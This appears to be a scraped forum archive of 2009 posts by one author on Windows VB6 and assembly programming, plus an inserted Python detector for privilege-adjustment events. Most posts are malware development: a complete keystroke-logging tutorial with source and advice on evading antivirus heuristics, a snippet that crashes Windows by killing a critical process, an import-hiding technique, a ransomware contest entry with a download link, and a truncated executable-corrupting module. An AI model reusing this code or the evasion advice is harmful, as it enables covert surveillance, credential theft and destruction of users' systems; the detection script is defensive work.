Programming / Visual Basic Programming / [SNIPPET] mNativeTokens {RtlAdjustPrivilege - Native API}
on: 18 August 2009, 17:33 pm
'---------------------------------------------------------------------------------------
' Module    : mNativeTokens
' Author    : Karcrack
' Now$      : 18/08/2009 17:18
' Used for? : Get Privileges using Native API (RtlAdjustPrivilege)
' Reference : http://forum.sysinternals.com/forum_posts.asp?TID=15745
'---------------------------------------------------------------------------------------
Option Explicit

'NTDLL
Private Declare Function RtlAdjustPrivilege Lib "NTDLL" (ByVal Privilege As Long, ByVal bEnablePrivilege As Long, ByVal bCurrentThread As Long, ByRef OldState As Long) As Long

' Privilege LUID values as defined in winnt.h (SE_*_PRIVILEGE)
Public Enum PRIVILEGES_ENUM
    SeAssignPrimaryTokenPrivilege = 3       ' Replace a process-level token
    SeAuditPrivilege = 21                   ' Generate security audits.
    SeBackupPrivilege = 17                  ' Grant all file read access (ACL Bypass)
    SeChangeNotifyPrivilege = 23            ' Receive file/folder change notifications
    SeCreateGlobalPrivilege = 30            ' Create global objects
    SeCreatePagefilePrivilege = 15          ' Create pagefile
    SeCreatePermanentPrivilege = 16         ' Create permanent shared object
    SeCreateSymbolicLinkPrivilege = 35      ' (W.VISTA) Create symbolic links
    SeCreateTokenPrivilege = 2              ' Create a token
    SeDebugPrivilege = 20                   ' Open any process (ACL Bypass)
    SeEnableDelegationPrivilege = 27        ' (W.2000) Trust users for delegation
    SeImpersonatePrivilege = 29             ' Enable thread impersonation
    SeIncreaseBasePriorityPrivilege = 14    ' Increase process priority
    SeIncreaseQuotaPrivilege = 5            ' Increase process memory quota
    SeIncreaseWorkingSetPrivilege = 33      ' (W.VISTA) Increase process WS
    SeLoadDriverPrivilege = 10              ' Load/Unload driver
    SeLockMemoryPrivilege = 4               ' Lock pages in memory
    SeMachineAccountPrivilege = 6           ' Create user account
    SeManageVolumePrivilege = 28            ' Manage files on a volume
    SeProfileSingleProcessPrivilege = 13    ' Gather process profiling info
    SeRelabelPrivilege = 32                 ' Modify object label
    SeRemoteShutdownPrivilege = 24          ' Shutdown a remote computer
    SeRestorePrivilege = 18                 ' Grant all file write access (ACL Bypass)
    SeSecurityPrivilege = 8                 ' Manage auditing and security log
    SeShutdownPrivilege = 19                ' Initiate Shutdown
    SeSyncAgentPrivilege = 26               ' (W.2000) Use directory sync services
    SeSystemEnvironmentPrivilege = 22       ' Modify firmware environment values
    SeSystemProfilePrivilege = 11           ' Gather system profiling info
    SeSystemtimePrivilege = 12              ' Change Time
    SeTakeOwnershipPrivilege = 9            ' Change object owner (ACL Bypass)
    SeTcbPrivilege = 7                      ' Identify as a trusted, protected subsystem
    SeTimeZonePrivilege = 34                ' (W.VISTA) Change time zone
    SeTrustedCredManAccessPrivilege = 31    ' (W.VISTA) Access the Credential Manager (trusted caller)
    SeUndockPrivilege = 25                  ' Remove from docking station
    ' SeUnsolicitedInputPrivilege           ' (OBSOLETE) Read unsolicited input (from terminal device);
    '                                       ' no LUID is defined for it, so it is left out of the enum
End Enum

Public Function AsignPrivilege(ByVal lPriv As PRIVILEGES_ENUM, Optional ByVal bEnable As Boolean = True, Optional ByVal bThread As Long = 0, Optional ByRef lOldState As Long) As Boolean
    ' RtlAdjustPrivilege returns an NTSTATUS; 0 (STATUS_SUCCESS) means the privilege was adjusted
    AsignPrivilege = (RtlAdjustPrivilege(lPriv, bEnable, bThread, lOldState) = 0)
End Function
The Enum is longer than the code. Well, I think it's clear what this code does... it assigns privileges to our application using a native API, avoiding the calls to several APIs that would otherwise be needed to do the same thing. Regards
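From the defender's side, the token adjustment that this wrapper performs is auditable: when "Audit Authorization Policy Change" is enabled, Windows records a Security event 4703 ("A user right was adjusted") naming the subject, the process and the privileges it enabled. The following Python is an added example, not code from the post or from its author: it runs a small detection over constructed records whose field names (EventID, SubjectUserName, ProcessName, EnabledPrivilegeList) follow event 4703, while the key=value line shape, the sample lines, the SENSITIVE_PRIVILEGES set and the DEFAULT_ALLOWLIST of expected system binaries are all assumptions made for the example. It flags a sensitive privilege (the ones the enum marks "ACL Bypass", plus the impersonation, driver-load and token-creation ones) enabled by an unexpected process, and separately flags a single event that enables many privileges at once.

```python
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, Iterable, List

# Privileges whose enablement is worth an alert: each one bypasses an ACL check,
# lets a process act as another identity, or loads code into the kernel.
SENSITIVE_PRIVILEGES: FrozenSet[str] = frozenset({
    "SeDebugPrivilege", "SeTcbPrivilege", "SeLoadDriverPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeCreateTokenPrivilege",
})

# Processes expected to toggle such privileges during normal operation (lower-cased paths).
# Example assumption: tune this allowlist to the environment being monitored.
DEFAULT_ALLOWLIST: FrozenSet[str] = frozenset({
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\services.exe",
})

# Constructed sample records. Field names follow Windows Security event 4703
# ("A user right was adjusted"); the key=value line shape is a simplification for this example.
SAMPLE_EVENTS: List[str] = [
    r'EventID=4703 SubjectUserName=alice ProcessName="C:\Windows\System32\svchost.exe" EnabledPrivilegeList=SeChangeNotifyPrivilege',
    r'EventID=4624 SubjectUserName=alice LogonType=2',
    r'EventID=4703 SubjectUserName=alice ProcessName="C:\Users\alice\Downloads\tool.exe" EnabledPrivilegeList=SeDebugPrivilege',
    r'EventID=4703 SubjectUserName=SYSTEM ProcessName="C:\Windows\System32\lsass.exe" EnabledPrivilegeList=SeTcbPrivilege',
    r'EventID=4703 SubjectUserName=alice ProcessName="C:\Users\alice\Downloads\tool.exe" '
    r'EnabledPrivilegeList=SeDebugPrivilege,SeTcbPrivilege,SeLoadDriverPrivilege,SeBackupPrivilege,SeRestorePrivilege',
]

# key=value pairs; a value is either a double-quoted string (may contain spaces) or a bare token
_FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    user: str
    process: str
    privileges: List[str]
    reason: str            # "sensitive-privilege" or "bulk-enable"


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value record into a dict; quoted values lose their quotes only."""
    return {key: value.strip('"') for key, value in _FIELD_RE.findall(line)}


def enabled_privileges(event: Dict[str, str]) -> List[str]:
    """EnabledPrivilegeList is a comma-separated list; empty field -> no privileges."""
    return [p for p in event.get("EnabledPrivilegeList", "").split(",") if p]


def analyze(lines: Iterable[str], allowlist: FrozenSet[str] = DEFAULT_ALLOWLIST,
            bulk_threshold: int = 5) -> List[Finding]:
    """One Finding per 4703 event from a non-allowlisted process that either enables
    bulk_threshold or more privileges at once, or enables at least one sensitive privilege."""
    findings: List[Finding] = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") != "4703":
            continue
        process = event.get("ProcessName", "")
        if process.lower() in allowlist:
            continue
        privileges = enabled_privileges(event)
        sensitive = sorted(set(privileges) & SENSITIVE_PRIVILEGES)
        user = event.get("SubjectUserName", "")
        if len(privileges) >= bulk_threshold:
            findings.append(Finding(user, process, privileges, "bulk-enable"))
        elif sensitive:
            findings.append(Finding(user, process, sensitive, "sensitive-privilege"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.reason}] {f.user} via {f.process}: {', '.join(f.privileges)}")
```

On the constructed sample the allowlisted svchost.exe and lsass.exe records are skipped and the two tool.exe records are reported, the second one as a bulk enable. Passing an empty allowlist surfaces the lsass.exe SeTcbPrivilege record as well, which is the usual trade-off: the allowlist removes noise from system processes but must itself be kept small and reviewed.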

Programming / Visual Basic Programming / [VB6] Creating an 'advanced' Keylogger {HOOK}
on: 17 August 2009, 19:18 pm
This tutorial is part of the #1 CM EZINE... Index:
- Introduction:
- What is a Keylogger?
- Types of Keyloggers.
- What are they for?
- Getting to the point:
- APIs.
- Declarations, Constants and Types.
- Functions.
- Example code.
- Farewell and advice.
Introduction:
What is a keylogger?
A keylogger (Key=Key, Logger=Recorder) is a diagnostic tool used in software development that records the keystrokes made on the keyboard, in order to store them in a file and/or send them over the Internet. So we take it that it records the keys pressed on the keyboard.
Types of Keyloggers.
Well, there are several types of keyloggers; I'm going to focus on the software ones. There are three types:
- Ring 0: Those that run from the system kernel, which makes them quite a bit harder to remove.
- Hook: They run in User Mode and use a 'Hook' into the system, so that when a key is pressed the system notifies you. This is the method we'll cover in the practical part.
- Other methods: These are other methods, usually worse. For example, a keylogger that every so often checks key by key which one is pressed.
What are they for?
Keyloggers record any key pressed on the system, so they can be used for many things. From checking whether your employees visit websites they shouldn't, to covertly obtaining other people's information.
Getting to the point:
APIs:
The APIs we will use are the following:
- CopyMemory: To dump the hook's information into a variable.
- SetWindowsHookExA: To set the keyboard hook.
- CallNextHookEx: To continue with our hook.
- UnhookWindowsHookEx: To remove the keyboard hook.
- GetAsyncKeyState: To find out whether the Shift key is pressed.
- GetForegroundWindow: To get the window that has focus.
- GetWindowTextA: To get a window's text.
Declarations, Constants and Types.
Constants: WH_KEYBOARD_LL = 13: This constant holds the value that tells the SetWindowsHookEx API what type of Hook it is.
Global declarations: KBHook: This global declaration holds the number assigned to our keyboard Hook. KeyData: To store the collected keys before saving them. lHwnd: To store the last active window.
Types: KBDLLHOOKSTRUCT: To get the information the Hook gives us.
Functions:
Function to enable or disable the keyboard hook:
Public Sub ManageKeylogger(ByVal Enable As Boolean)
    Select Case Enable
        Case True
            KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance, 0)
        Case False
            Call UnhookWindowsHookEx(KBHook)
    End Select
End Sub
Función para recibir la información del AddressOf: Public Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long Dim KeyBoardHook As KBDLLHOOKSTRUCT If nCode = 0 Then CopyMemory KeyBoardHook, lParam, Len(KeyBoardHook) With KeyBoardHook If .Flags = 0 Or .Flags = 1 Then If SaveLog(TranslateKey(.VkCode)) > 50 Then Call LogToFile(App.Path & "\Log.log") End If End If End With Else KBProc = CallNextHookEx(KBHook, nCode, wParam, lParam) End If End Function
Función para pasar del valor numérico de la tecla a el valor correspondiente: Private Function TranslateKey(ByVal KeyCode As Long) As String Dim LngShift As Long 'Funcion optimizada para su uso en teclados españoles. LngShift = GetAsyncKeyState(vbKeyShift) If KeyCode >= 58 And KeyCode <= 90 Then TranslateKey = IIf(LngShift <> 0, UCase(Chr(KeyCode)), LCase(Chr(KeyCode))) ElseIf KeyCode >= 96 And KeyCode <= 105 Then TranslateKey = Chr(KeyCode - 48) ElseIf KeyCode >= 112 And KeyCode <= 123 Then TranslateKey = "{F" & KeyCode - 111 & "}" Else If KeyCode = 160 Then TranslateKey = "" If KeyCode = 161 Then TranslateKey = "{SHIFT DER.}" If KeyCode = 38 Then TranslateKey = "{FLECHA ARRIBA}" If KeyCode = 40 Then TranslateKey = "{FLECHA ABAJO}" If KeyCode = 37 Then TranslateKey = "{FLECHA IZQ.}" If KeyCode = 39 Then TranslateKey = "{FLECHA DER.}" If KeyCode = 32 Then TranslateKey = "{ESPACIO}" If KeyCode = 27 Then TranslateKey = "{ESC}" If KeyCode = 46 Then TranslateKey = "{DEL}" If KeyCode = 36 Then TranslateKey = "{HOME}" If KeyCode = 35 Then TranslateKey = "{END}" If KeyCode = 33 Then TranslateKey = "{PAGE UP}" If KeyCode = 34 Then TranslateKey = "{PAGE DOWN}" If KeyCode = 45 Then TranslateKey = "{PASTE}" If KeyCode = 144 Then TranslateKey = "{NUM}" If KeyCode = 111 Then TranslateKey = "{NUMPAD / }" If KeyCode = 106 Then TranslateKey = "{NUMPAD * }" If KeyCode = 109 Then TranslateKey = "{NUMPAD - }" If KeyCode = 107 Then TranslateKey = "{NUMPAD + }" If KeyCode = 13 Then TranslateKey = "{ENTER}" If KeyCode = 8 Then TranslateKey = "{BACK}" If KeyCode = 221 Then TranslateKey = "{ACCENTO}" If KeyCode = 9 Then TranslateKey = "{TAB}" If KeyCode = 20 Then TranslateKey = "{BLOQ. 
MAYUS}" If KeyCode = 162 Then TranslateKey = "{STRG LEFT}" If KeyCode = 163 Then TranslateKey = "{STRG DER.}" If KeyCode = 91 Then TranslateKey = "{WINDOWS}" If KeyCode = 164 Then TranslateKey = "{ALT}" If KeyCode = 165 Then TranslateKey = "{ALTGR}" If KeyCode = 93 Then TranslateKey = "{MENU CONTEXTUAL}" If KeyCode = 188 Then TranslateKey = IIf(LngShift <> 0, ";", ",") If KeyCode = 190 Then TranslateKey = IIf(LngShift <> 0, ":", ".") If KeyCode = 189 Then TranslateKey = IIf(LngShift <> 0, "_", "-") If KeyCode = 191 Then TranslateKey = IIf(LngShift <> 0, "'", "#") If KeyCode = 187 Then TranslateKey = IIf(LngShift <> 0, "*", "+") If KeyCode = 186 Then TranslateKey = IIf(LngShift <> 0, "Ü", "ü") If KeyCode = 192 Then TranslateKey = IIf(LngShift <> 0, "Ö", "ö") If KeyCode = 222 Then TranslateKey = IIf(LngShift <> 0, "Ä", "ä") If KeyCode = 219 Then TranslateKey = IIf(LngShift <> 0, "?", "ß") If KeyCode = 220 Then TranslateKey = IIf(LngShift <> 0, "°", "^") If KeyCode = 48 Then TranslateKey = IIf(LngShift <> 0, "=", "0") If KeyCode = 49 Then TranslateKey = IIf(LngShift <> 0, "!", "1") If KeyCode = 50 Then TranslateKey = IIf(LngShift <> 0, """", "2") If KeyCode = 51 Then TranslateKey = IIf(LngShift <> 0, "§", "3") If KeyCode = 52 Then TranslateKey = IIf(LngShift <> 0, "$", "4") If KeyCode = 53 Then TranslateKey = IIf(LngShift <> 0, "%", "5") If KeyCode = 54 Then TranslateKey = IIf(LngShift <> 0, "&", "6") If KeyCode = 55 Then TranslateKey = IIf(LngShift <> 0, "/", "7") If KeyCode = 56 Then TranslateKey = IIf(LngShift <> 0, "(", "8") If KeyCode = 57 Then TranslateKey = IIf(LngShift <> 0, ")", "9") If KeyCode = 145 Then TranslateKey = "{ROLL}" If KeyCode = 44 Then TranslateKey = "{PRINT}" If KeyCode = 19 Then TranslateKey = "{PAUSE}" If TranslateKey = "" And KeyCode <> 160 Then TranslateKey = KeyCode End If End Function
Función para guardar la información pulsada en una variable: Public Function SaveLog(ByVal sKey As String) As Double Dim aHwnd As Long Dim WinText As String aHwnd = GetForegroundWindow If aHwnd <> lHwnd Then lHwnd = aHwnd WinText = String$(255, Chr$(0)) Call GetWindowText(aHwnd, WinText, Len(WinText)) WinText = Left$(WinText, InStr(WinText, Chr$(0)) - 1) KeyData = KeyData & vbCrLf & "{" & WinText & "} - [" & Now$ & "]" & vbCrLf End If KeyData = KeyData & sKey SaveLog = Len(KeyData) End Function
Función para volcar la variable en un fichero: Public Sub LogToFile(ByVal sPath As String) Open sPath For Binary As #1 Put #1, , KeyData Close #1 End Sub
Código de ejemplo:Option Explicit '||||||||||||||||||||||| '| | '|Autor: Karcrack | '|Fecha: 24/09/08 | '| | '||||||||||||||||||||||| Private Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long Private Declare Function UnhookWindowsHookEx Lib "user32.dll" (ByVal hHook As Long) As Long Private Declare Function CallNextHookEx Lib "user32.dll" (ByVal hHook As Long, ByVal nCode As Long, ByVal wParam As Long, ByRef lParam As Any) As Long Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long) Private Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal vKey As Long) As Integer Private Const WH_KEYBOARD_LL As Long = 13 Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long Public Type KBDLLHOOKSTRUCT VkCode As Long ScanCode As Long Flags As Long Time As Long DwExtraInfo As Long End Type Dim KBHook As Long Dim KeyData As String Dim lHwnd As Long Public Sub ManageKeylogger(ByVal Enable As Boolean) Select Case Enable Case True KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance, 0) Case False Call UnhookWindowsHookEx(KBHook) End Select End Sub Public Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long Dim KeyBoardHook As KBDLLHOOKSTRUCT If nCode = 0 Then CopyMemory KeyBoardHook, lParam, Len(KeyBoardHook) With KeyBoardHook If .Flags = 0 Or .Flags = 1 Then If SaveLog(TranslateKey(.VkCode)) > 50 Then Call LogToFile(App.Path & "\Log.log") End If End If End With Else KBProc = CallNextHookEx(KBHook, nCode, wParam, lParam) End If End Function Private Function TranslateKey(ByVal KeyCode As Long) As String Dim LngShift As Long 'Funcion optimizada para su 
uso en teclados españoles. LngShift = GetAsyncKeyState(vbKeyShift) If KeyCode >= 58 And KeyCode <= 90 Then TranslateKey = IIf(LngShift <> 0, UCase(Chr(KeyCode)), LCase(Chr(KeyCode))) ElseIf KeyCode >= 96 And KeyCode <= 105 Then TranslateKey = Chr(KeyCode - 48) ElseIf KeyCode >= 112 And KeyCode <= 123 Then TranslateKey = "{F" & KeyCode - 111 & "}" Else If KeyCode = 160 Then TranslateKey = "" If KeyCode = 161 Then TranslateKey = "{SHIFT DER.}" If KeyCode = 38 Then TranslateKey = "{FLECHA ARRIBA}" If KeyCode = 40 Then TranslateKey = "{FLECHA ABAJO}" If KeyCode = 37 Then TranslateKey = "{FLECHA IZQ.}" If KeyCode = 39 Then TranslateKey = "{FLECHA DER.}" If KeyCode = 32 Then TranslateKey = "{ESPACIO}" If KeyCode = 27 Then TranslateKey = "{ESC}" If KeyCode = 46 Then TranslateKey = "{DEL}" If KeyCode = 36 Then TranslateKey = "{HOME}" If KeyCode = 35 Then TranslateKey = "{END}" If KeyCode = 33 Then TranslateKey = "{PAGE UP}" If KeyCode = 34 Then TranslateKey = "{PAGE DOWN}" If KeyCode = 45 Then TranslateKey = "{PASTE}" If KeyCode = 144 Then TranslateKey = "{NUM}" If KeyCode = 111 Then TranslateKey = "{NUMPAD / }" If KeyCode = 106 Then TranslateKey = "{NUMPAD * }" If KeyCode = 109 Then TranslateKey = "{NUMPAD - }" If KeyCode = 107 Then TranslateKey = "{NUMPAD + }" If KeyCode = 13 Then TranslateKey = "{ENTER}" If KeyCode = 8 Then TranslateKey = "{BACK}" If KeyCode = 221 Then TranslateKey = "{ACCENTO}" If KeyCode = 9 Then TranslateKey = "{TAB}" If KeyCode = 20 Then TranslateKey = "{BLOQ. 
MAYUS}" If KeyCode = 162 Then TranslateKey = "{STRG LEFT}" If KeyCode = 163 Then TranslateKey = "{STRG DER.}" If KeyCode = 91 Then TranslateKey = "{WINDOWS}" If KeyCode = 164 Then TranslateKey = "{ALT}" If KeyCode = 165 Then TranslateKey = "{ALTGR}" If KeyCode = 93 Then TranslateKey = "{MENU CONTEXTUAL}" If KeyCode = 188 Then TranslateKey = IIf(LngShift <> 0, ";", ",") If KeyCode = 190 Then TranslateKey = IIf(LngShift <> 0, ":", ".") If KeyCode = 189 Then TranslateKey = IIf(LngShift <> 0, "_", "-") If KeyCode = 191 Then TranslateKey = IIf(LngShift <> 0, "'", "#") If KeyCode = 187 Then TranslateKey = IIf(LngShift <> 0, "*", "+") If KeyCode = 186 Then TranslateKey = IIf(LngShift <> 0, "Ü", "ü") If KeyCode = 192 Then TranslateKey = IIf(LngShift <> 0, "Ö", "ö") If KeyCode = 222 Then TranslateKey = IIf(LngShift <> 0, "Ä", "ä") If KeyCode = 219 Then TranslateKey = IIf(LngShift <> 0, "?", "ß") If KeyCode = 220 Then TranslateKey = IIf(LngShift <> 0, "°", "^") If KeyCode = 48 Then TranslateKey = IIf(LngShift <> 0, "=", "0") If KeyCode = 49 Then TranslateKey = IIf(LngShift <> 0, "!", "1") If KeyCode = 50 Then TranslateKey = IIf(LngShift <> 0, """", "2") If KeyCode = 51 Then TranslateKey = IIf(LngShift <> 0, "§", "3") If KeyCode = 52 Then TranslateKey = IIf(LngShift <> 0, "$", "4") If KeyCode = 53 Then TranslateKey = IIf(LngShift <> 0, "%", "5") If KeyCode = 54 Then TranslateKey = IIf(LngShift <> 0, "&", "6") If KeyCode = 55 Then TranslateKey = IIf(LngShift <> 0, "/", "7") If KeyCode = 56 Then TranslateKey = IIf(LngShift <> 0, "(", "8") If KeyCode = 57 Then TranslateKey = IIf(LngShift <> 0, ")", "9") If KeyCode = 145 Then TranslateKey = "{ROLL}" If KeyCode = 44 Then TranslateKey = "{PRINT}" If KeyCode = 19 Then TranslateKey = "{PAUSE}" If TranslateKey = "" And KeyCode <> 160 Then TranslateKey = KeyCode End If End Function Public Function SaveLog(ByVal sKey As String) As Double Dim aHwnd As Long Dim WinText As String aHwnd = GetForegroundWindow If aHwnd <> lHwnd Then lHwnd = 
aHwnd WinText = String$(255, Chr$(0)) Call GetWindowText(aHwnd, WinText, Len(WinText)) WinText = Left$(WinText, InStr(WinText, Chr$(0)) - 1) KeyData = KeyData & vbCrLf & "{" & WinText & "} - [" & Now() & "]" & vbCrLf End If KeyData = KeyData & sKey SaveLog = Len(KeyData) End Function Public Sub LogToFile(ByVal sPath As String) Open sPath For Binary As #1 Put #1, , KeyData Close #1 End Sub
Farewell and advice.
That's the end of the tutorial; writing and coding it took me approximately 1 hour and 30 minutes... let's see if next time I beat my record. Well, recommendations, there are many... among them, don't copy the code as is, because it will become detectable in a matter of minutes (if it isn't already). To make this code undetectable you must load the APIs at runtime, because the heuristics will certainly trigger. Regards, Happy Coding, Regards

Programming / Visual Basic Programming / [SRC]- mGetAPIPtr, getting the pointer of an API... new method :P
on: 11 August 2009, 13:54 pm
Well, after doing some research I've managed to get the pointer of an API by calling DllFunctionCall@MSVBVM60.DLL... As every VB6 programmer should know, when an external API is called from VB, DllFunctionCall is called to get the pointer... in other words, APIs declared directly from the code are not added to the IAT... And well, I decided to take advantage of that
Option Explicit
'---------------------------------------------------------------------------------------
' Module    : mGetAPIPtr
' Author    : Karcrack
' Now$      : 11/08/2009 13:07
' WebPage   : http://www.advancevb.com.ar
' Used for? : Get API Pointer without calling any external API
' Thanks.   :
'   - Cobein: Support and Unicode-ANSI function (=
'---------------------------------------------------------------------------------------

'MSVBVM60
Private Declare Function DllFunctionCall Lib "MSVBVM60" (ByRef typeAPI As tAPICall) As Long

Private Type tAPICall
    ptsLIB As Long          ' Pointer to ANSI String that contains Library
    ptsProc As Long         ' Pointer to ANSI String that contains Procedure
    lReserved As Long       ' Just reserved...
    lPointer As Long        ' Pointer to the buffer that will contain temp variables from DllFunctionCall
    lpBuffer(3) As Long     ' Buffer that will contain temp variables
End Type

Public Function GetAPIPtr(ByVal sLib As String, ByVal sProc As String) As Long
    Dim tAPI As tAPICall
    Dim bvLib() As Byte
    Dim bvMod() As Byte

    Call Unicode2ANSI(sLib, bvLib)
    Call Unicode2ANSI(sProc, bvMod)

    With tAPI
        .ptsLIB = VarPtr(bvLib(0))
        .ptsProc = VarPtr(bvMod(0))
        .lReserved = &H40000
        .lPointer = VarPtr(.lpBuffer(0))
    End With

    GetAPIPtr = DllFunctionCall(tAPI)
End Function

'COBEIN (=
Private Sub Unicode2ANSI(ByVal sUNICODE As String, ByRef bvANSI() As Byte)
    Dim i As Long
    ' One extra element (zero-initialised) acts as the ANSI string terminator
    ReDim bvANSI(Len(sUNICODE))
    For i = 1 To Len(sUNICODE)
        bvANSI(i - 1) = Asc(Mid$(sUNICODE, i, 1))
    Next i
End Sub
With this alone we can't call the APIs, so I've modified Cobein's cInvoke code so that it calls the pointer you pass to it... Here is a fairly clear example: http://www.box.net/shared/tbbihznz6r Ah! If you intend to call APIs that take Strings, remember to use the UNICODE version of that API (*W). Regards

Programming / Visual Basic Programming / [SNIPPET] mBSOD - Blow up your Windows
on: 17 July 2009, 13:42 pm
'--------------------------------------------------------------------------------------- ' Module : mBSOD ' Author : Karcrack ' Now$ : 16/07/2009 18:08 ' Used for? : Make a BSOD on W$ ' Tested On : W. XP ... W. Vista (Thanks Kiash)... W. Seven (Thanks SkyWeb/Dessa) '--------------------------------------------------------------------------------------- Option Explicit 'NTDLL Private Declare Function CsrGetProcessId Lib "ntdll.dll" () As Long Private Declare Function RtlAdjustPrivilege Lib "ntdll.dll" (ByVal Privilege As Long, ByVal Enable As Long, ByVal Client As Long, WasEnabled As Long) As Long 'KERNEL32 Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function TerminateProcess Lib "kernel32.dll" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Public Sub CrashWindows() Dim hProc As Long Call GetAllPrivilegies hProc = OpenProcess(&H1F0FFF, 0&, CsrGetProcessId) ' &H1F0FFF = PROCESS_ALL_ACCESS Call TerminateProcess(hProc, 0&) End Sub Private Sub GetAllPrivilegies() Dim i As Long For i = 0 To 200: Call RtlAdjustPrivilege(ByVal i&, 1, 0, 0): Next i End Sub
If anyone can, please test it on Windows Vista or Windows 7... Thanks for testing it, Kiash, SkyWeb, Dessa

Programming / ASM / [FASM-SRC]IsUserAnAdmin [Inaugurating the SubForum :P]
on: 20 May 2009, 18:49 pm
Well, I'm posting this mostly just to inaugurate the subforum
include 'win32ax.inc'

entry Main

section '.code' code readable executable
Main:
    invoke  IsUserAnAdmin
    test    eax, eax
    jz      .No
    invoke  MessageBoxA, 0, Sip, Title, 0
    jmp     .Exit
.No:
    invoke  MessageBoxA, 0, No, Title, 0
.Exit:
    invoke  ExitProcess, 0

;section '.data' data readable writeable
Sip     db 'Si', 0
No      db 'No', 0
Title   db 'Somos Admin?', 0

section '.idata' import data readable
    library K32, 'KERNEL32.DLL',\
            S32, 'SHELL32.DLL',\
            U32, 'USER32.DLL'

    import K32, ExitProcess, 'ExitProcess'
    import S32, IsUserAnAdmin, 'IsUserAnAdmin'
    import U32, MessageBoxA, 'MessageBoxA'
It simply uses the Shell32 API called 'IsUserAnAdmin'. More information about the API: http://msdn.microsoft.com/en-us/library/bb776463.aspx Regards
PS: Enjoy the SubForum!
PS2: I propose moving the ASM-related posts that are in General Programming HERE!

Computer Security / Abril negro / [ABRIL NEGRO][MALWARE]Karcrack Ransom
on: 28 April 2009, 16:24 pm
What is it?
This is the project I'm submitting this year for Abril Negro ([Abril Negro 2009] Malware development contest). First of all, the definition of Ransomware: Ransomware is malware [...] that, by various techniques, prevents the owner of a document from accessing it. The most commonly used method is to encrypt the document with a key and leave the user instructions on how to obtain it after paying a "ransom". Since this is a contest I won't be asking for a ransom.
How does it work?
These are the steps the malware follows:
- Enumerates recently accessed files
- Gets the path of these files and checks that they still exist
- 'Encrypts' them and adds the code that will display the message asking for a 'ransom'
By the way, the code uses fairly weak encryption.
Download?
Here it is: http://www.box.net/shared/3oull7lb59 All that's left to say is that this is the first malware I've distributed. Regards

Programming / Visual Basic Programming / [SOURCE][RET Exe Corruption] Corrupts any Executable
on: 7 April 2009, 19:01 pm
Code related to this post:
'--------------------------------------------------------------------------------------- ' Modulo : mPatchExe ' Autor : Karcrack ' Fecha-Hora: 07/04/2009 18:43 ' Finalidad : Deshabilita cualquier ejecutable '--------------------------------------------------------------------------------------- Option Explicit Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Dest As Any, Src As Any, ByVal L As Long) Private Enum ImageSignatureTypes IMAGE_DOS_SIGNATURE = &H5A4D ''\\ MZ IMAGE_OS2_SIGNATURE = &H454E ''\\ NE IMAGE_OS2_SIGNATURE_LE = &H454C ''\\ LE IMAGE_VXD_SIGNATURE = &H454C ''\\ LE IMAGE_NT_SIGNATURE = &H4550 ''\\ PE\0\0 End Enum Private Type IMAGE_DOS_HEADER e_magic As Integer ' Magic number e_cblp As Integer ' Bytes on last page of file e_cp As Integer ' Pages in file e_crlc As Integer ' Relocations e_cparhdr As Integer ' Size of header in paragraphs e_minalloc As Integer ' Minimum extra paragraphs needed e_maxalloc As Integer ' Maximum extra paragraphs needed e_ss As Integer ' Initial (relative) SS value e_sp As Integer ' Initial SP value e_csum As Integer ' Checksum e_ip As Integer ' Initial IP value e_cs As Integer ' Initial (relative) CS value e_lfarlc As Integer ' File address of relocation table e_ovno As Integer ' Overlay number e_res(0 To 3) As Integer ' Reserved words e_oemid As Integer ' OEM identifier (for e_oeminfo) e_oeminfo As Integer ' OEM information; e_oemid specific e_res2(0 To 9) As Integer ' Reserved words e_lfanew As Long ' File address of new exe header End Type ' MSDOS File header Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer characteristics As Integer End Type ' Directory format. Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type ' Optional header format. Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16 Private Type IMAGE_OPTIONAL_HEADER ' Standard fields. 
